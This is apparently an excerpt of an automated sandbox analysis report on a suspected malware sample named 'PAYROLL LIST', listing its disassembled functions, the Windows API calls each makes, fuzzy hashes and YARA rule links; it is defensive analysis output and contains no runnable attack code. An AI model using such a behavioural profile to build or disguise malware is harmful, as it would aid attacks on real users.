Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 7bea737d3f0ee38b6096b6bdd336b24facc022b2b40449f7aa80a0354b5af1b0
Instruction ID: 21729465ff76c4f2f4bec1c215540d7237d0668d55fcce037fff3dceaf100777
Opcode Fuzzy Hash: 7bea737d3f0ee38b6096b6bdd336b24facc022b2b40449f7aa80a0354b5af1b0
Instruction Fuzzy Hash: CB11D336200305AFDB25AF64DC05D7A77B8FF46314B80816AF906CB2A0EB71D891C7E0

Function 00A52F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A52FB5

Part of subcall function 00A4395C: __FF_MSGBANNER.LIBCMT ref: 00A43973
Part of subcall function 00A4395C: __NMSG_WRITE.LIBCMT ref: 00A4397A
Part of subcall function 00A4395C: RtlAllocateHeap.NTDLL(00B60000,00000000,00000001,00000001,00000000,?,?,00A3F507,?,0000000E), ref: 00A4399F

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: d766cb66aefa70f6eff54b8e8237f13751a5278274eb472a3f670fa1db576327
Instruction ID: 23c83b8c8f899881fb7efe939ebafe5133765270d58a8edb487dcfddf689c7bc
Opcode Fuzzy Hash: d766cb66aefa70f6eff54b8e8237f13751a5278274eb472a3f670fa1db576327
Instruction Fuzzy Hash: AF11E732509312ABCF217FB0AD4466D3BA4BF813A1F204425FC4A9A192DB34CD8887A0

Function 00A6058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00A605AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00A605C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00A605DD
FreeLibrary.KERNEL32(?), ref: 00A60632

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 1d44982eb7aa2998ad44460d6ecf73210becc0ae8995240509974c6ed3d8e050
Instruction ID: 01a0d6f077f68517fa8059f7d2a4bb55f0ae9ba3aeb0a8d4c73ca86fe088c1c4
Opcode Fuzzy Hash: 1d44982eb7aa2998ad44460d6ecf73210becc0ae8995240509974c6ed3d8e050
Instruction Fuzzy Hash: C6218E75900209EFDB20CF95DC88EDBBBB8EF40700F008569E55796190E7B0EA95DF60

Function 00A66713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00A66733
_memset.LIBCMT ref: 00A66754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00A667A6
CloseHandle.KERNEL32(00000000), ref: 00A667AF

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: edffa819c47ce7a2391d19d1888460da2e6d649316ce07f389f891cc29da0746
Instruction ID: 3caea4e2ad1e3e5612dd83422a84070a55de197ae5d1ca085559f84a6740375a
Opcode Fuzzy Hash: edffa819c47ce7a2391d19d1888460da2e6d649316ce07f389f891cc29da0746
Instruction Fuzzy Hash: 781106769012287AE7209BA5AC4DFEBBABCEF45724F10419AF505E71C0D3704E80CBB4

Function 00A5B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A5AA79
Part of subcall function 00A5AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A5AA83
Part of subcall function 00A5AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A5AA92
Part of subcall function 00A5AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A5AA99
Part of subcall function 00A5AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A5AAAF

GetLengthSid.ADVAPI32(?,00000000,00A5ADE4,?,?), ref: 00A5B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A5B227
HeapAlloc.KERNEL32(00000000), ref: 00A5B22E
CopySid.ADVAPI32(?,00000000,?), ref: 00A5B247

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 91f82ad0add7b84d0a17d6bc033f778b3f010c29f39c6cb025517bb943e22ce9
Instruction ID: c422516d05cc710f6524ad4e98a618019d509f503793bbdba05069ef96b1ecb3
Opcode Fuzzy Hash: 91f82ad0add7b84d0a17d6bc033f778b3f010c29f39c6cb025517bb943e22ce9
Instruction Fuzzy Hash: A1116D71A10205AFDB04DF94DD85AAEB7B9FF95306F14842DE98397250D731AE49CB30

Function 00A5B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00A5B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A5B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A5B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A5B4DB

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4f1eb6b5cd52e4adea33ec8924a8529299c37dba07b30f6e16d83a0c90dc2523
Instruction ID: e88dc87665df4da13d25f32c70188d193dcb23d46d4142189cc9a4778603649f
Opcode Fuzzy Hash: 4f1eb6b5cd52e4adea33ec8924a8529299c37dba07b30f6e16d83a0c90dc2523
Instruction Fuzzy Hash: 77112A7A900218FFDB21DFA9C985E9DBBB4FB08710F204091EA05B7295D771AE11DBA4

Function 00A3B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00A3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A3B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00A3B5A5
GetClientRect.USER32(?,?), ref: 00A9E69A
GetCursorPos.USER32(?), ref: 00A9E6A4
ScreenToClient.USER32(?,?), ref: 00A9E6AF

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 622414dc5b2dc18ee1e789722b5c106f552fd4cc4a35e519ca16775df7dc6e2e
Instruction ID: 5d8994bbca9e220f4878b99328f36c39af05a049af69c08a69d1b1ba2eb731ba
Opcode Fuzzy Hash: 622414dc5b2dc18ee1e789722b5c106f552fd4cc4a35e519ca16775df7dc6e2e
Instruction Fuzzy Hash: 3E110631A1002ABFCB10DF98D9859EE77B9EB09304F100455FA42E7181D734AA92CBB1

Function 00A6732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A67352
MessageBoxW.USER32(?,?,?,?), ref: 00A67385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A6739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A673A2

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 7f8cd8274a0a6bada0e3062550aa9c2b53ba1eb9dd89395c1bb063bacb6e26a2
Instruction ID: 169a2aa2bbaba28c32808cee3d9c5af41b034ca8b801f9b9b5d450c4ac630aa9
Opcode Fuzzy Hash: 7f8cd8274a0a6bada0e3062550aa9c2b53ba1eb9dd89395c1bb063bacb6e26a2
Instruction Fuzzy Hash: 0C11E1B2A14245ABCB02DBA8DC49ADE7BB9AB55314F144315F961E72A1D77089018BA0

Function 00A3D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A3D1BA
GetStockObject.GDI32(00000011), ref: 00A3D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A3D1D8

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 186bc2e216e9afa8d77e9cd927759637370bac890a8e23c2e379537906d9026c
Instruction ID: 1cf66946f1d33c39a4dba974ae6bc910c825a2d5526213e544195fdcf6ccf3cc
Opcode Fuzzy Hash: 186bc2e216e9afa8d77e9cd927759637370bac890a8e23c2e379537906d9026c
Instruction Fuzzy Hash: 9B11AD7250150AFFEF128F90AC50EEABB6AFF09364F040206FA0552050C731DD619BA0

Function 00A54DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00A54E16

Part of subcall function 00A554F5: __fltout2.LIBCMT ref: 00A5551E

__cftog_l.LIBCMT ref: 00A54E3C
__cftoe_l.LIBCMT ref: 00A54E6E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 9aed9e08f6c5db3b63cf4dc607f7e1a597477f39bdec306aa34f070cd8f8368f
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 1A014B3240018ABBCF125F94DD528EE3F33BB1C35AB598455FE1859131D336DAB9AB81

Function 00A47452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A47A0D: __getptd_noexit.LIBCMT ref: 00A47A0E

__lock.LIBCMT ref: 00A4748F
InterlockedDecrement.KERNEL32(?), ref: 00A474AC
_free.LIBCMT ref: 00A474BF
InterlockedIncrement.KERNEL32(00B72AA0), ref: 00A474D7

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 231e73499b1ff640ed96f78995300f94463ad7d7b731909f8ee4b8ff99704dcd
Instruction ID: fed0b5c74cb0cddb31cf4a9a58c35dc96e25c3e2c5ed0ce12c0b40078632b1d2
Opcode Fuzzy Hash: 231e73499b1ff640ed96f78995300f94463ad7d7b731909f8ee4b8ff99704dcd
Instruction Fuzzy Hash: E601963D906651EBC711EFA4950576DBB70BF85710F158006F41577690C7345942CFD6

Function 00A47A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00A47AD8

Part of subcall function 00A47CF4: __mtinitlocknum.LIBCMT ref: 00A47D06
Part of subcall function 00A47CF4: EnterCriticalSection.KERNEL32(00000000,?,00A47ADD,0000000D), ref: 00A47D1F

InterlockedIncrement.KERNEL32(?), ref: 00A47AE5
__lock.LIBCMT ref: 00A47AF9
___addlocaleref.LIBCMT ref: 00A47B17

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: c88f7740b68c5af5da5ef7c0a587db982d4502479043087b243b689f5ccb9c11
Instruction ID: 9ae5477d996f631b5684d41d2bbcd487faeff791731146562362b7a9a0d94189
Opcode Fuzzy Hash: c88f7740b68c5af5da5ef7c0a587db982d4502479043087b243b689f5ccb9c11
Instruction Fuzzy Hash: 59018079404B00EFD720DF75DA0674AB7F0EF90325F20890EE49A976E0CB74A641CB51

Function 00A8E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A8E33D
_memset.LIBCMT ref: 00A8E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00AE3D00,00AE3D44), ref: 00A8E37B
CloseHandle.KERNEL32 ref: 00A8E38D

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: eab90362e331734613a63ac9cc93c8cbf6379f7c9939ca317e4f053a52ae1122
Instruction ID: 1b6d254c73e8317da2dd1215ea0cf3238534c72507f2fa1df1ec8db2bfc29768
Opcode Fuzzy Hash: eab90362e331734613a63ac9cc93c8cbf6379f7c9939ca317e4f053a52ae1122
Instruction Fuzzy Hash: 33F0BEF2500344BBEA00ABA1ACC9F773E5DDB05710F004820BF08DB1A2D3759E018BA8

Function 00A8EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00A3AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00A3AFE3
Part of subcall function 00A3AF83: SelectObject.GDI32(?,00000000), ref: 00A3AFF2
Part of subcall function 00A3AF83: BeginPath.GDI32(?), ref: 00A3B009
Part of subcall function 00A3AF83: SelectObject.GDI32(?,00000000), ref: 00A3B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A8EA8E
LineTo.GDI32(00000000,?,?), ref: 00A8EA9B
EndPath.GDI32(00000000), ref: 00A8EAAB
StrokePath.GDI32(00000000), ref: 00A8EAB9

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 7a8dbf2619832f8453e5d8b605b3770f3d87b9d5662061ea50565038f9ff77f5
Instruction ID: 33c04ce93049c7eb8df3e07ad6cabaa632d62a693edd2441846f69e0a7979971
Opcode Fuzzy Hash: 7a8dbf2619832f8453e5d8b605b3770f3d87b9d5662061ea50565038f9ff77f5
Instruction Fuzzy Hash: 4CF0823100526ABBDB12EFD4AD0DFCE3F19AF17711F044201FA52650E187745653CB95

Function 00A5C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A5C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00A5C85D
GetCurrentThreadId.KERNEL32 ref: 00A5C864
AttachThreadInput.USER32(00000000), ref: 00A5C86B

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: ffbafd24b582b55365b2dbb7c45a3be363f8b66ebb6e9a9394fcc1e05c37be29
Instruction ID: 4f98719d60ed3a55b8a75140025779a647ddc7f378e6bf894bf548dbedb249b2
Opcode Fuzzy Hash: ffbafd24b582b55365b2dbb7c45a3be363f8b66ebb6e9a9394fcc1e05c37be29
Instruction Fuzzy Hash: BBE030711412247ADB105FA1DC0DEDB7F5CEF167A1F008015B94A84890D7718585CBE0

Function 00A5B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00A5B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,00A5AC9D), ref: 00A5B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A5AC9D), ref: 00A5B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,00A5AC9D), ref: 00A5B0F1

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 3a72d6b3702335ae657918badedb349a0a2e5b74febc28f20a5f9602289fef76
Instruction ID: aba75f57005ac0cdda82cc540ca7f2ae6bc6904ed198464259fdbb0e47506427
Opcode Fuzzy Hash: 3a72d6b3702335ae657918badedb349a0a2e5b74febc28f20a5f9602289fef76
Instruction Fuzzy Hash: EEE0BF72611212ABD7209FF19D0DB473BA8AF56797F118818A683DA4D0DB748447C761

Function 00A3B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A3B496
SetTextColor.GDI32(?,000000FF), ref: 00A3B4A0
SetBkMode.GDI32(?,00000001), ref: 00A3B4B5
GetStockObject.GDI32(00000005), ref: 00A3B4BD
GetWindowDC.USER32(?,00000000), ref: 00A9DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 00A9DE38
GetPixel.GDI32(00000000,?,00000000), ref: 00A9DE51
GetPixel.GDI32(00000000,00000000,?), ref: 00A9DE6A
GetPixel.GDI32(00000000,?,?), ref: 00A9DE8A
ReleaseDC.USER32(?,00000000), ref: 00A9DE95

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: ea98f4307a0f1ef33ed83bac2c84a56d5e2812212181ee73fd143c331feac8d9
Instruction ID: 1ee670060f76a1ea2d8326bef31262671421a331d38c685bc5ba1c3e4cc102e0
Opcode Fuzzy Hash: ea98f4307a0f1ef33ed83bac2c84a56d5e2812212181ee73fd143c331feac8d9
Instruction Fuzzy Hash: F8E0ED71600241AEDF219FA4EC09BD83F51AB52335F14C76AF6AA584E1C7714582DB21

Function 00A9B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00A9B29A
GetDC.USER32(00000000), ref: 00A9B2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A9B2C3
ReleaseDC.USER32 ref: 00A9B2E2

Memory Dump Source

